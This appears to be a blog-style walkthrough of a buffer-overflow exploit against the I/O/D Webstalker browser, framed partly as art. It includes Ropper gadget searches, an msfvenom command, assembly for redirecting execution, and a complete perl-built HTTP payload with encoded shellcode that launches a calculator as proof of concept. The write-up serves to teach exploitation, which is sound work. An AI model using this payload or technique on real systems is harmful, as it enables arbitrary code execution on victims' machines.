Everything that happens here takes place at the lowest level of bytes. Basically directly in the CPU of the computer. It is not about characters that are interpreted here, but about ones and zeros that are processed in sequence and perform calculations. The machine does not care what is written there. It processes bit by bit the machine code at hand. There are no control mechanisms or hierarchies at this level. The machine does not know whether it is a file, a program, a character, art, or anything else. At higher abstract levels, there would perhaps be checks that the system makes to distinguish correct from incorrect characters. In machine language, instead, anything can be executed, read or written. Should it not be possible to process the bits, the only thing the machine has to counter the dysfunctional zeros and ones is its crash. Until then, everything is equally code and data - depending on the state of processing the machine is currently in. Since the bytes of the Webstalker program are in memory just like those of the operating system and all other programs themselves, the program's own bytes can also be repurposed. These gadgets are ones and zeros that happen to be in memory because they are tiny parts of the program itself. If now all structures and rules existing so far are left aside, it is possible to provoke a jump of the CPU with the overwriting of a register which is led thereupon from gadget to gadget. Thus, the system enters a completely new state that processes a sequence of instructions in machine language that did not exist in the program until that moment. The program undergoes a process of complete atomization and subsequent recomposition, possibly comparable to a kind of "ego dissolution" which people describe after consuming psychedelics.

bytes was the substance

So we look for a place where the required bytes are already lying around ready to use.

This is in my case at address 6f77016b. In the memory segment number 6f77016b are bytes 0x0012fb00 by chance! This is not always the case, but only because somewhere in the machine code of the webstalker exactly this combination of bits is present.

If ECX is now overwritten with 6f77016b, it points to 0012fb00, which is then written to EAX.

This is read again as an address by the call instruction, but now it can be controlled what is at 0012fb00!

Because this is the memory area where the requested URL was stored.

Now a special link can be crafted: (For readability, the bytes are represented here in hexadecimal)


These bytes (\xc3\xfe\xe5\x77) are written backwards into the memory, thus resulting in 77e5fec3 wich is now located at address 0012fb00. The address 77e5fec3 is chosen deliberately. The call instruction jumps to the location 77e5fec3 and executes the bytes there, no matter what their original purpose was. The code flow has been successfully redirected.

To achieve complete control over the program, so-called gadgets can be used. These are instructions already present in the program, which cannot be programmed themselves, but are helpful when arranged to get the code flow under control. Execution is directed from gadget to gadget, thereby manipulating the CPU registers so that they are set just right for the final jump into the injected code.

The address 77e5fec3 points to a gadget that was also found completely by chance in the programs own binary data. To find gadgets there are tools that help. Such a tool is for example Ropper.

$ ropper --nocolor --file kernel32.dll > kerneldllrop
$ grep "call eax" kerneldllrop  | grep add
0x77e4a432: add al, 0; call eax;
0x77e4a432: add al, 0; call eax; ret;
0x77e5ff6b: add al, 0x56; call eax;
0x77e65492: add bh, bh; jne 0x8549e; call eax;

Ropper finds almost 30,000 gadgets in a library used by Webstalker. Therefore, it is necessary to search specifically for gadgets that can be used at this point. The helpful gadget for this exploit is the following code:

add al, 56
call eax

This assembler code adds the value 0x56 with the last byte in EAX and then calls EAX directly via a call instruction. The code flow jumps directly to the new value in EAX. Again, this is in the memory area described by the link, because EAX already points there but slightly higher. These instructions increase EAX a little bit and let it now point to a place further behind the link. So the link can be extended again by the appropriate length, but this time with executable code.

This code is called shellcode, because it can start a shell on the system, which leads to the fact that further instructions can be executed. Mostly, shellcode means any assembler code that has been smuggled in, not just code actually starting a shell. Shellcode, like the program itself, consists of a sequence of assembler instructions that control the behavior of the program.
Shellcode can also be generated with the Metasploit framework. More precisely, with the msfvenom tool.

$ msfvenom -a x86 -p windows/exec cmd=calc.exe -b "\x00" -f c

In the end I used something like this to create the complete buffer overflow payload:

$ perl -e 'print "HTTP/1.0 200 OKServer: SimpleHTTP/0.6 Python/3.7.3Date: Thu, 07 Jan 2021 17:35:40 GMTContent-type: text/htmlContent-Length: 24Last-Modified: Thu, 07 Jan 2021 16:53:36 GMTLast-Modified: Thu, 07 Jan 2021 16:53:36 GMT" . "\x90"x3324 . "AAAA" . "\x90"x160 . "\xCC"x4 . "\x6B\x01\x77\x6F" . "\x90"x16 . "AAAA" . "\x90"x10 . "\x90"x500 . "\xbb\xa5\x93\x40\x02\xdb\xc1\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x31\x83\xe8\xfc\x31\x58\x0f\x03\x58\xaa\x71\xb5\xfe\x5c\xf7\x36\xff\x9c\x98\xbf\x1a\xad\x98\xa4\x6f\x9d\x28\xae\x22\x11\xc2\xe2\xd6\xa2\xa6\x2a\xd8\x03\x0c\x0d\xd7\x94\x3d\x6d\x76\x16\x3c\xa2\x58\x27\x8f\xb7\x99\x60\xf2\x3a\xcb\x39\x78\xe8\xfc\x4e\x34\x31\x76\x1c\xd8\x31\x6b\xd4\xdb\x10\x3a\x6f\x82\xb2\xbc\xbc\xbe\xfa\xa6\xa1\xfb\xb5\x5d\x11\x77\x44\xb4\x68\x78\xeb\xf9\x45\x8b\xf5\x3e\x61\x74\x80\x36\x92\x09\x93\x8c\xe9\xd5\x16\x17\x49\x9d\x81\xf3\x68\x72\x57\x77\x66\x3f\x13\xdf\x6a\xbe\xf0\x6b\x96\x4b\xf7\xbb\x1f\x0f\xdc\x1f\x44\xcb\x7d\x39\x20\xba\x82\x59\x8b\x63\x27\x11\x21\x77\x5a\x78\x2f\x86\xe8\x06\x1d\x88\xf2\x08\x31\xe1\xc3\x83\xde\x76\xdc\x41\x9b\x89\x96\xc8\x8d\x01\x7f\x99\x8c\x4f\x80\x77\xd2\x69\x03\x72\xaa\x8d\x1b\xf7\xaf\xca\x9b\xeb\xdd\x43\x4e\x0c\x72\x63\x5b\x6f\x15\xf7\x07\x5e\xb0\x7f\xad\x9e"' > bitte_mach_einfach

The problem is that the link in memory unfortunately does not have enough space for a shellcode of this length. The crawler from the webstalker simply skips links that are too long. Therefore only a few instructions can be placed there. But now that the program is completely under control, code can be placed there that prepares the final jump to the shellcode.


Fortunately, the EDI register already points to the part of memory where all the bytes from the buffer overflow are located. Even if it changes dynamically during runtime, EDI always points to the right place. There is enough space for the shellcode. But EDI points to the beginning of this area and the shellcode can only be placed a bit further back. Therefore the corresponding value must be added to EDI to point to the right place. The EDX register is not needed and can be used here for the calculation. The following code prepares the jump:

xor edx, edx 	; -> xor nulls the register = 00000000
mov dl, 0x60	; -> adds 60 to the last byte = 00000060
mov dh, 0x1e	; -> add 1e to the previous byte = 00001e60
add edi, edx 	; -> summarizes 1e60, edi points to edi+1e60
call edi 		; -> here lays our shellcode

And this is what it looks like in an text editor:

links with shellcode in it

Finally, EDI is called, which now points to the beginning of the shellcode that will be executed.

To break it down, here is everything summarized again in a simple and clear flow chart:

a simple and clear flowchart

The shellcode can be any program. For example, in this case it would be possible to take full control of the computer on which the webstalker was running. But it is common in the hacker scene to "pop" the "calc" as a proof of concept, i.e. to pop up the operating system's calculator program.

If all the bytes are in place, the web server is running and outputting the correct data, all you have to do is start the webstalker and use the crawler to access the correct page. All the preparation described here is for this one moment of running the exploit. Once the webstalker is given the command to retrieve the page, it receives the data, which then leads to the controlled crash. Visually, it is not visible and the performance does not take a second, but the code goes through the exact process described in detail here.
The result, in turn, is visible. The Webstalker program is no longer the Webstalker program...

The I/O/D Webstalker is now a calculator.